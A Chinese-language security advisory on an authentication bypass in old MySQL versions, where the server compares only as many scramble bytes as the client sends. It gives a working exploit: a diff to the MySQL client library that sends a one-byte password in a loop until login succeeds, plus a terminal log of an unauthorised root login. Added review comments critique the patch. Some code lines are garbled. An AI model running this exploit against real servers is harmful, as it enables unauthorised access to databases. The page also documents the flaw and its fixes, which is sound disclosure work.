
◆ Mysql低版本存在的远程访问漏洞

◆ Mysql远程访问漏洞


    一. 概述

MySQL是一个常用的小型数据库系统,国内有很多站点正在使用它作为web数据库。
在MySQL的口令验证机制里存在安全漏洞。它允许任何用户从有目标机器数据库访问权限
的机器上与该数据库进行连接。攻击者不必知道帐号的口令,而只需知道一个可用的帐号
名即可。
所有低于Mysql 3.22.32的版本可能都是有问题的。

二. 细节

MySQL的口令认证的机制是这样的:当一个客户端发送一个连接请求的时候,服务端会首
先产生一个随机字符串(A),将这个字符串发送给客户端,客户端会用这个字符串和用户
输入的口令所产生的Hash值(B)生成一个新的字符串(C)。 并将这个新的字符串返回给服
务端。服务端将原先的随机字符串(A)与数据库中保存的口令Hash值(B')再生成一个字符
串(C'),比较这两个字符串(C和C')的内容是否一致,如果一致就允许登录,否则就不允许
登录。

然而,当比较C和C'这两个字符串内容的时候,由于没有考虑比较字符串的长度,导致了
问题的产生。从sql/password.c中可以看到有问题的代码部分:

/*
** Excerpt of check_scramble() as the page quotes it from sql/password.c.
** Lines reading "......" are elisions made by the page's author, not code.
**
** Returns 0 when every compared byte matches and 1 at the first mismatch.
*/
my_bool check_scramble(const char *scrambled, const char *message,
ulong *hash_pass, my_bool old_ver)
{
......
/*
** The loop is bounded only by the NUL terminator of `scrambled`, which the
** surrounding text identifies as the client-supplied response (C). Nothing
** in the visible code compares its length with the length of the expected
** value, so a response shorter than expected is checked over its own
** length only. This is the defect the page describes; the correction it
** calls for is to reject a length mismatch before comparing any bytes.
*/
while (*scrambled)
{
/*
** `*to++ ^ extra` is one byte of the server-computed value (C') according
** to the page; `to` and `extra` are presumably set up in the elided part.
*/
if (*scrambled++ != (char) (*to++ ^ extra))
/* Mismatch: reject. The opening delimiter of the trailing comment on the
** next line is garbled in this listing. */
return 1; ?* Wrong password */
}
/* Reached when the loop ends without a mismatch: accept. */
return 0;
}
......

这里的scrambled就是客户端提供的字符串C,(*to++ ^ extra))就是服务端生成的字符串
C'(中的一个字符).我们可以看到,比较的次数决定于客户端提供的字符串C的长度。问
题就出在这里了,本来服务端应当首先判断这两个字符串长度是否相等的,但是它没有,
所以如果客户端提供的字符串只有一个字符,那么check_scramble()将只比较C和C'的第
一个字节。


C'的内容是随机产生的,所以第一次登录和第二次登录时,C'的第一个字符通常是不同的。
例如:
@SQOGRFA 第一次
VV]KPIU_ 第二次
M[PPRYX^ 第三次

但是,根据分析,C'的每一个字符只可能有32种可能性,即:
ABCDEFGHIGKLMNOPQRSTUVWXYZ\_][]@^

那么理论上说,如果我们每次连接都发送同一个字符(比如'A')作为口令,那么32次连接
中会有一次成功。当然,这只是从概率上统计,实际上尝试的次数会从1次到100多次不等。

三. 测试程序

根据上面的分析,我们只要每次发送一个字符给服务端,如果返回错误信息,我们再次发
送这个字符,直到成功为止。为了简单起见,我们可以修改mysql的client程序.
在client/libmysql.c中, mysql_real_connect()函数是用来与服务端建立连接的。

......
MYSQL * STDCALL
mysql_real_connect(MYSQL *mysql,const char *host, const char *user,
const char *passwd, const char *db,
uint port, const char *unix_socket,uint client_flag)
{

......
DBUG_PRINT("info",("user: %s",buff+5));
/* 这里的scramble()函数将产生校验用的口令字符串C,然后将C复制到strend(buff+5)+1
处,既然我们只是要发送一个字符过去,我们可以注释掉这两行,直接将一个字符
复制过去即可。
*/
?br> ?br> end=scramble(strend(buff+5)+1, scramble_buff, passwd,
?my_bool) (mysql->protocol_version == 9));

if (db && (mysql->server_capabilities & CLIENT_CONNECT_WITH_DB))
{
......
}

修改后变成:

......
MYSQL * STDCALL
mysql_real_connect(MYSQL *mysql,const char *host, const char *user,
const char *passwd, const char *db,
uint port, const char *unix_socket,uint client_flag)
{

......
DBUG_PRINT("info",("user: %s",buff+5));
?br> /*
end=scramble(strend(buff+5)+1, scramble_buff, passwd,
?my_bool) (mysql->protocol_version == 9));
?/
end = strend(buff+5) +1 ;
*end = 'A';
end ++;
*end = '\0'; ?br>
if (db && (mysql->server_capabilities & CLIENT_CONNECT_WITH_DB))
{
......
}

然后我们将这个mysql_real_connect()改名成mysql_real_connect_orig(),构造一个新的
mysql_real_connect(),它将循环调用原来的mysql_real_connect_orig(),当不断尝试发送
字符'A'进行连接,直到通过口令验证为止。


注意:下面提供的程序仅供在本机测试使用,请不要用于非法目的,后果自负!

libmysql.c.diff
8<-----8<-----8<-----8<---- cut here ---8<-----8<-----8<-----8<-----8<----
--- mysql-3.22.27/client/libmysql.c Wed Oct 6 00:37:25 1999
+++ mysql-3.22.27_new/client/libmysql.c Tue Feb 13 14:12:37 2000
@@ -46,6 +46,8 @@
uint mysql_port=0;
my_string mysql_unix_port=0;

+uint trynum=0;
+
#define CLIENT_CAPABILITIES (CLIENT_LONG_PASSWORD | CLIENT_LONG_FLAG | CLIENT_LOCAL_FILES)

#if defined(MSDOS) || defined(__WIN32__)
@@ -985,13 +987,13 @@
}


-/*
+/*
** Note that the mysql argument must be initialized with mysql_init()
** before calling mysql_real_connect !
*/

MYSQL * STDCALL
-mysql_real_connect(MYSQL *mysql,const char *host, const char *user,
+mysql_real_connect_orig(MYSQL *mysql,const char *host, const char *user,
const char *passwd, const char *db,
uint port, const char *unix_socket,uint client_flag)
{
@@ -1276,8 +1278,15 @@
else
read_user_name((char*) buff+5);
DBUG_PRINT("info",("user: %s",buff+5));
- end=scramble(strend(buff+5)+1, scramble_buff, passwd,
- ?my_bool) (mysql->protocol_version == 9));
+/* We skip the step that create valid passwd .:) ?- warning3 */
+ //end=scramble(strend(buff+5)+1, scramble_buff, passwd,
+ // ?my_bool) (mysql->protocol_version == 9));
+ trynum++;
+ printf("Trying %d times\n",trynum);
+ end = strend(buff+5) +1 ;
+ ?end = 'A'; /* We just send one character as password */
+ end ++;
+ ?end = '\0';
if (db && (mysql->server_capabilities & CLIENT_CONNECT_WITH_DB))
{
end=strmov(end+1,db);
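Review bot: `printf("Trying %d times\n",trynum);` formats `trynum`, which the first hunk declares as `uint`, with `%d`; use `%u`. The two `//` lines are C++-style comments in a file that otherwise uses `/* */`, which an older C compiler may reject, so the disabled `scramble()` call is better placed in a block comment. The comment above it should record why a one-byte response is being sent, e.g. `/* test only: a vulnerable server compares just as many bytes as the client sends (see check_scramble) */`. The enclosing function begins and ends outside this hunk.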
@@ -1286,7 +1295,7 @@
}
if (my_net_write(net,buff,(uint) (end-buff)) || net_flush(net) ||
net_safe_read(mysql) == packet_error)
- goto error;
+ return NULL; /* If login failed,we return NULL */
if (client_flag & CLIENT_COMPRESS) /* We will use compression */
net->compress=1;
if (db && mysql_select_db(mysql,db))
@@ -1317,6 +1326,23 @@
DBUG_RETURN(0);
}

+/*
+** We make one fake mysql_real_connect() function,it will "brute force"
+** to guess the right password until succeed ! ?- warning3
+*/
+
+MYSQL * STDCALL
+mysql_real_connect(MYSQL *mysql,const char *host, const char *user,
+ const char *passwd, const char *db,
+ uint port, const char *unix_socket,uint client_flag)
+{
+ MYSQL *res;
+
+ while (!(res=mysql_real_connect_orig(mysql,host,user,passwd,db,port,unix_socket,client_flag)));
+ printf("\nooOH,We come in! ;-)\n\n");
+ return res;
+
+}

static my_bool mysql_reconnect(MYSQL *mysql)
{
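Review bot: The new `mysql_real_connect()` retries in `while (!(res=mysql_real_connect_orig(...)));` with no upper bound and treats every NULL return as a wrong guess. If `mysql_real_connect_orig()` also returns NULL for other failures (the `DBUG_RETURN(0)` just above the wrapper suggests it does), the loop never ends against a server that checks the response length or cannot be reached. A test build should cap the attempts, e.g. `for (i = 0; i < MAX_TRIES && !res; i++) res = mysql_real_connect_orig(...);`, where `MAX_TRIES` is a constant of your choosing. Because the wrapper keeps the public name, every program linked against this build ignores `passwd`, so the header comment should say the library is for an isolated test server and must not be installed. On the server side each failed attempt is a rejected login, so a run of rejections for one account from one host is the pattern to alert on.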

>8----->8----->8----->8---- cut here --->8----->8----->8----->8----->8----

[warning3@warninng3 warning3]$ ls -ld libmysql.c.diff mysql-3.22.27
-rw-rw-r-- ? warning3 warning3 ?409 Feb 13 14:24 libmysql.c.diff
drwxrwxr-x 21 warning3 warning3 ?096 Oct 6 06:36 mysql-3.22.27/
[warning3@warninng3 warning3]$ patch -p0 patching file `mysql-3.22.27/client/libmysql.c'
[warning3@warninng3 warning3]$ cd mysql-3.22.27
[warning3@warninng3 mysql-3.22.27]$ ./configure;make;cd client;
[warning3@warninng3 client]$ ./mysql -uroot -pblahblah
Trying 1 times
Trying 2 times
Trying 3 times
Trying 4 times
Trying 5 times
Trying 6 times

ooOH,We come in! ;-)

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 539 to server version: 3.22.27

Type 'help' for help.

mysql>

四. 解决办法

1. 升级到最新版:


2. 对于外部连接做Ip限制

感谢:

Robert van der Meulen 他发现了这个漏